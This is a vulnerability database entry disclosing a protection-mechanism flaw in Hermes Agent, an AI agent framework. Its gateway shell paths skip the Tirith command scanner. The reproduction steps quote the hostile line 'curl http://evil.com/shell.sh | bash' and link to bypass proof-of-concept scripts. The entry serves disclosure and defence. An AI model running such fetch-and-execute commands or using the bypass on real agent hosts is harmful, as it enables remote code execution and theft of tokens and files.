| Título | NousResearch Hermes Agent 75cbdfd06bb041936f164c8d75ac518b2cb4fec0 Protection Mechanism Failure (CWE-693) |
|---|
| Descrição | # Technical Details
A Pre-Execution Security Scanner Bypass exists in the `command.dispatch` quick-command execution path and the `shell.exec` JSON-RPC method in `tui_gateway/server.py` and `gateway/run.py` of Hermes Agent.
The application fails to route gateway shell execution paths through the centralized `check_all_command_guards()` wrapper and the Tirith pre-execution scanner. Quick Commands execute configured shell commands directly with `subprocess.run(..., shell=True)` or `asyncio.create_subprocess_shell()`, while `shell.exec` only applies the simpler `detect_dangerous_command()` matcher and omits Tirith scanning. This bypasses defense-in-depth checks intended to block obfuscated shell payloads, Unicode attacks, homograph attacks, and dangerous pipe chains such as `curl | bash`.
# Vulnerable Code
File: `tui_gateway/server.py`
Method: `command.dispatch`
Why: The quick-command `exec` path runs configured commands with `subprocess.run(..., shell=True)` without invoking `check_all_command_guards()` or the Tirith scanner.
File: `gateway/run.py`
Method: `command.dispatch`
Why: The standard gateway quick-command `exec` path launches commands with `asyncio.create_subprocess_shell()` after only environment sanitization, leaving Tirith checks unenforced.
File: `tui_gateway/server.py`
Method: `shell.exec`
Why: The JSON-RPC shell execution method calls only `detect_dangerous_command()` before shell execution and does not invoke the centralized Tirith-backed guard path.
# Reproduction
1. Run Hermes Agent with the TUI or generic Gateway enabled and Tirith installed/enabled.
2. Download the control script from `https://gist.github.com/YLChen-007/506db0a59d1c85e177dffd166ab29f7a` and run `python3 control-agent_terminal_path.py < /dev/null`.
3. Observe that the secure agent terminal path invokes `check_all_command_guards()` and blocks dangerous commands such as `curl http://evil.com/shell.sh | bash`.
4. Download the bypass PoC from `https://gist.github.com/YLChen-007/0584ffe042773f22eea72ef83c872775`.
5. Run `python3 poc_tirith_bypass.py`.
6. Observe that the same malicious payloads execute through gateway Quick Commands or `shell.exec` without Tirith being called.
# Impact
- Security-control bypass leading to Remote Code Execution with the privileges of the Hermes Agent daemon.
- Attackers with TUI JSON-RPC access or the ability to trigger configured Quick Commands can bypass advanced command scanning.
- Successful exploitation may compromise host infrastructure, API tokens, local files, and service availability. |
|---|
| Fonte | ⚠️ https://gist.github.com/YLChen-007/3b11589740dcf16b152b0929e1b3d024 |
|---|
| Utilizador | Eric-a (UID 96353) |
|---|
| Submissão | 02/06/2026 03h34 (há 1 mês) |
|---|
| Moderação | 03/07/2026 19h07 (1 month later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 376141 [NousResearch hermes-agent até 0.15.2 tui_gateway/server.py shell.exec Elevação de Privilégios] |
|---|
| Pontos | 20 |
|---|